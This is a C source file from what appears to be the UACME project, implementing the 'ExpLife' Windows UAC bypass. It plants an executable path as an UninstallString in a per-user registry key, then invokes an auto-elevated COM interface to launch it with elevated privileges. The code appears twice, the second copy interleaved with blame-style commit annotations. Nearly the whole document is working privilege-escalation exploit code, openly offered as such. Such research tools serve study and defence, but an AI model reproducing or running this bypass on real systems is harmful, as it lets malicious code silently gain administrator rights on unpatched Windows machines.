UACME/Source/Akagi/methods/explife.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2016 - 2018
*
*  TITLE:       EXPLIFE.C
*
*  VERSION:     2.87
*
*  DATE:        19 Jan 2018
*
*  ExpLife UAC bypass using IARPUninstallStringLauncher.
*  For description please visit original URL
*  http://www.freebuf.com/articles/system/116611.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
* ucmMasqueradedAPRLaunchFile
*
* Purpose:
*
* Initialize interface and run required method.
*
*/
BOOL ucmMasqueradedAPRLaunchFile(
    _In_ LPWSTR lpszFileGuid
)
{
    BOOL                         bCond = FALSE;
    HRESULT                      r = E_FAIL;
    IID                          xIID_IARPUninstallStringLauncher;
    CLSID                        xCLSID_IARPUninstallStringLauncher;
    IARPUninstallStringLauncher *USLauncher = NULL;

    do {

        if (lpszFileGuid == NULL)
            break;

        if (CLSIDFromString(T_CLSID_UninstallStringLauncher, 
            &xCLSID_IARPUninstallStringLauncher) != NOERROR)
            break;

        if (IIDFromString(T_IID_IARPUninstallStringLauncher, 
            &xIID_IARPUninstallStringLauncher) != S_OK)
            break;

        r = CoCreateInstance(&xCLSID_IARPUninstallStringLauncher, NULL,
            CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
            &xIID_IARPUninstallStringLauncher, &USLauncher);

        if (r != S_OK)
            break;

        r = ucmMasqueradedCoGetObjectElevate(T_CLSID_UninstallStringLauncher,
            CLSCTX_LOCAL_SERVER, &xIID_IARPUninstallStringLauncher, &USLauncher);
        if (r != S_OK)
            break;

        r = USLauncher->lpVtbl->LaunchUninstallStringAndWait(USLauncher, 
            0, lpszFileGuid, FALSE, NULL);

    } while (bCond);

    if (USLauncher != NULL) {
        USLauncher->lpVtbl->Release(USLauncher);
    }

    return SUCCEEDED(r);
}

/*
* ucmUninstallLauncherMethod
*
* Purpose:
*
* Bypass UAC using AutoElevated undocumented IARPUninstallStringLauncher interface.
*
* Fixed in Windows 10 RS3
*
*/
BOOL ucmUninstallLauncherMethod(
    _In_ LPWSTR lpszExecutable
)
{
    BOOL        bResult = FALSE, bCond = FALSE;
    SIZE_T      cbData;
    HKEY        hKey = NULL;
    LRESULT     lResult;
    GUID        guid;
    WCHAR       szKeyName[MAX_PATH], szGuid[64];

    do {

        if (lpszExecutable == NULL)
            break;

        if (CoCreateGuid(&guid) != S_OK)
            break;

        _strcpy(szKeyName, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"));
        if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
            _strcat(szKeyName, szGuid);

            lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
                szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);

            if (lResult != ERROR_SUCCESS)
                break;

            cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR);
            lResult = RegSetValueEx(hKey, TEXT("UninstallString"), 0, REG_SZ, (BYTE*)lpszExecutable,
                (DWORD)cbData);

            if (lResult != ERROR_SUCCESS)
                break;

            bResult = ucmMasqueradedAPRLaunchFile(szGuid);
        }

    } while (bCond);

    if (hKey != NULL) {
        RegCloseKey(hKey);
        RegDeleteKey(HKEY_CURRENT_USER, szKeyName);
    }

    return bResult;

}
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`/*******************************************************************************`
			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* (C) COPYRIGHT AUTHORS, 2016 - 2018`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`*`
			`* TITLE: EXPLIFE.C`
			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* VERSION: 2.87`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* DATE: 19 Jan 2018`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`*`
			`* ExpLife UAC bypass using IARPUninstallStringLauncher.`
			`* For description please visit original URL`
			`* http://www.freebuf.com/articles/system/116611.html`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`
			`#include "global.h"`

			`/*`
			`* ucmMasqueradedAPRLaunchFile`
			`*`
			`* Purpose:`
			`*`
			`* Initialize interface and run required method.`
			`*`
			`*/`
			`BOOL ucmMasqueradedAPRLaunchFile(`
			`_In_ LPWSTR lpszFileGuid`
			`)`
			`{`
			`BOOL bCond = FALSE;`
			`HRESULT r = E_FAIL;`
			`IID xIID_IARPUninstallStringLauncher;`
			`CLSID xCLSID_IARPUninstallStringLauncher;`
			`IARPUninstallStringLauncher *USLauncher = NULL;`

			`do {`

			`if (lpszFileGuid == NULL)`
			`break;`

Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`if (CLSIDFromString(T_CLSID_UninstallStringLauncher,`
			`&xCLSID_IARPUninstallStringLauncher) != NOERROR)`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`break;`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00
			`if (IIDFromString(T_IID_IARPUninstallStringLauncher,`
			`&xIID_IARPUninstallStringLauncher) != S_OK)`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`break;`

			`r = CoCreateInstance(&xCLSID_IARPUninstallStringLauncher, NULL,`
			`CLSCTX_INPROC_SERVER \| CLSCTX_LOCAL_SERVER \| CLSCTX_INPROC_HANDLER,`
			`&xIID_IARPUninstallStringLauncher, &USLauncher);`

			`if (r != S_OK)`
			`break;`

v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`r = ucmMasqueradedCoGetObjectElevate(T_CLSID_UninstallStringLauncher,`
v 2.5.6 Kongou removed from main executable, see ucmGWX function description for more info, made Yuubari module public, rearranged readme file. 2017-02-19 05:48:36 +00:00			`CLSCTX_LOCAL_SERVER, &xIID_IARPUninstallStringLauncher, &USLauncher);`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`if (r != S_OK)`
			`break;`

Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`r = USLauncher->lpVtbl->LaunchUninstallStringAndWait(USLauncher,`
			`0, lpszFileGuid, FALSE, NULL);`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
			`} while (bCond);`

			`if (USLauncher != NULL) {`
			`USLauncher->lpVtbl->Release(USLauncher);`
			`}`

			`return SUCCEEDED(r);`
			`}`

			`/*`
			`* ucmUninstallLauncherMethod`
			`*`
			`* Purpose:`
			`*`
			`* Bypass UAC using AutoElevated undocumented IARPUninstallStringLauncher interface.`
			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* Fixed in Windows 10 RS3`
			`*`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`*/`
			`BOOL ucmUninstallLauncherMethod(`
			`_In_ LPWSTR lpszExecutable`
			`)`
			`{`
			`BOOL bResult = FALSE, bCond = FALSE;`
Cleanup 2017-05-02 06:47:46 +00:00			`SIZE_T cbData;`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00			`HKEY hKey = NULL;`
			`LRESULT lResult;`
			`GUID guid;`
			`WCHAR szKeyName[MAX_PATH], szGuid[64];`

			`do {`

			`if (lpszExecutable == NULL)`
			`break;`

			`if (CoCreateGuid(&guid) != S_OK)`
			`break;`

Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`_strcpy(szKeyName, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"));`
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {`
			`_strcat(szKeyName, szGuid);`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`lResult = RegCreateKeyEx(HKEY_CURRENT_USER,`
			`szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`if (lResult != ERROR_SUCCESS)`
			`break;`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
Cleanup 2017-05-02 06:47:46 +00:00			`cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR);`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`lResult = RegSetValueEx(hKey, TEXT("UninstallString"), 0, REG_SZ, (BYTE*)lpszExecutable,`
Cleanup 2017-05-02 06:47:46 +00:00			`(DWORD)cbData);`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`if (lResult != ERROR_SUCCESS)`
			`break;`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`bResult = ucmMasqueradedAPRLaunchFile(szGuid);`
			`}`
v 2.5.5 ExpLife method integrated as #27 2017-02-09 07:37:03 +00:00
			`} while (bCond);`

			`if (hKey != NULL) {`
			`RegCloseKey(hKey);`
			`RegDeleteKey(HKEY_CURRENT_USER, szKeyName);`
			`}`

			`return bResult;`

			`}`